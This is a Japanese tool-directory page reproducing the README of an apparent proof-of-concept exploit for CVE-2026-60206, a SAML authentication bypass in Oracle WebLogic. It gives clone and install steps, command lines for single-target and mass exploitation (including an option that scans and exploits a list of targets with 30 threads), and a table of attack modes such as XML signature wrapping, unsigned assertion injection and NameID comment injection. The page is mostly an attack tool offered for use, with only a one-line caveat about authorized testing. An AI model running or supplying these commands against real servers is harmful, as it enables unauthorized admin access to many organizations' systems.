Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
POC-CVE-2026-60206 — cve cve-2026-60206 weblogic saml エクスプロイト poc 脆弱性 oracle スキャナ セキュリティ | Kitploit
ツール/GitHubGitHub/imbas007/poc-cve-2026-60206
認証と認可脆弱性スキャナー脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubimbas007/poc-cve-2026-60206

POC-CVE-2026-60206

cve cve-2026-60206 weblogic saml エクスプロイト poc 脆弱性 oracle スキャナ セキュリティ

リポジトリを見る
329122ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-60206 — Oracle WebLogic SAML 認証バイパス

CVE CVSS

CVSS 9.9 — Oracle WebLogic Server Core における SAML 認証バイパス。
影響を受けるバージョン: 12.2.1.4.0 14.1.1.0.0 14.1.2.0.0 15.1.1.0.0

⚠️ 許可されたセキュリティテストのみ。


インストール

git clone https://github.com/imbas007/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

使い方

単一ターゲット

# Detect version + SAML endpoints
python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect

# Full exploit (all attack vectors)
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all -u weblogic

# Specific mode
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode combo -u admin -v

# With proxy
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all --proxy http://127.0.0.1:8080 --no-verify

マススキャン

# Detect only
python3 CVE-2026-60206-exploit.py -l targets.txt -o results.json

# Detect + exploit (faster)
python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json

# Single URL mass mode
python3 CVE-2026-60206-exploit.py -l https://target:7002 --exploit

ターゲットファイル(1行に1つ):

192.168.1.100:7002
https://10.0.0.50
example.com

攻撃モードの一覧表示

python3 CVE-2026-60206-exploit.py --list-modes

攻撃モード

モード説明
unsigned署名なしSAMLアサーション注入
xswXML署名ラッピング(4種類)
nameidNameID操作 / コメント注入
combo統合: XSW + 署名なし + NameID ⭐
audienceAudienceRestriction バイパス
conditions時間/有効性制限のバイパス
replaySAMLレスポンスのリプレイ
allすべて実行

プロジェクト構成

CVE-2026-60206/
├── CVE-2026-60206-exploit.py   # Main script (single + mass)
├── mass_scan.py                # Mass scanner module
├── modules/
│   ├── samlib.py               # SAML manipulation (XSW, NameID, etc.)
│   ├── weblogic_client.py      # WebLogic HTTP client
│   └── logger.py               # Colored logging
├── requirements.txt
└── README.md

参照

  • Oracle 2026年7月 CPU
  • NVD: CVE-2026-60206
  • WebLogic SAML CVE-2018-2933 & CVE-2018-2998
ツールをダウンロード